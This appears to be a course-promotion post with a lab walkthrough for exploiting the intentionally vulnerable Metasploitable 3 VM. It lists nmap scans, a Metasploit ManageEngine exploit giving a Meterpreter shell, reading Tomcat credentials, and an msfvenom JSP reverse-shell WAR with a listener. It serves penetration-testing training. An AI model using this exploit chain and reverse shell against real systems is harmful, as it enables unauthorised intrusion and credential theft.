Published on January 9th, 2019 📆 | 3000 Views ⚑
0Metasploitable 3 Lab: Setup, Enumeration, and Exploitation
iSpeech.org
Please check out my Udemy courses! Coupon code applied to the following links....
https://www.udemy.com/hands-on-penetration-testing-labs-30/?couponCode=NINE99
https://www.udemy.com/hands-on-penetration-testing-labs-20/?couponCode=NINE99
https://www.udemy.com/kali-linux-web-app-pentesting-labs/?couponCode=NINE99
https://www.udemy.com/kali-linux-hands-on-penetration-testing-labs/?couponCode=NINE99
https://www.udemy.com/network-security-analysis-using-wireshark-snort-and-so/?couponCode=NINE99
https://www.udemy.com/snort-intrusion-detection-rule-writing-and-pcap-analysis/?couponCode=NINE99
Description:
This video from my Udemy course "Hands-on Penetration Testing Labs 2.0" will show you how setup, enumerate, and exploit one of the only available intentionally vulnerable Windows Server 2008 VMs, Metasploitable 3. This method is current as of January 2019.
All you will need is VirtualBox and Vagrant, which are easy to obtain. Check below for relevant commands and URLs.
Commands:
vagrant init
vagrant up
nmap -Pn -sn 192.168.56.0/24
nmap -A 192.168.56.107
msfconsole
use exploit /windows/http/manageengine_connectionid_write
set RHOST 192.168.56.103. *Remember there's two IP's configured. if one IP doesn’t work, try the other one*
set RPORT 8383
set SSL true
set LHOST 192.168.90.5
Now we have a meterpterer shell! Let's grab a cmd.exe shell.
execute -f cmd.exe -i -H
hostname / whoami
cd C:
cd Program Files
cd Apache Software Foundation
cd tomcat
cd apache-tomcat-8.0.33
cd conf
type tomcat-users.xml
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.56.102 LPORT=4445 -f war *greater than symbol* malicious.war
msfconsole
use exploit/multi/handler
set LHOST 192.168.56.102
set LPORT 4445
set PAYLOAD java/jsp_shell_reverse_tcp
run
URLs:
https://virtualbox.org
https://raw.githubusercontent.com/rapid7/metasploitable3/master/Vagrantfile
https://www.vagrantup.com/downloads.html
https://www.rapid7.com/db/modules/exploit/windows/http/desktopcentral_statusupdate_upload
source
0 Responses to Metasploitable 3 Lab: Setup, Enumeration, and Exploitation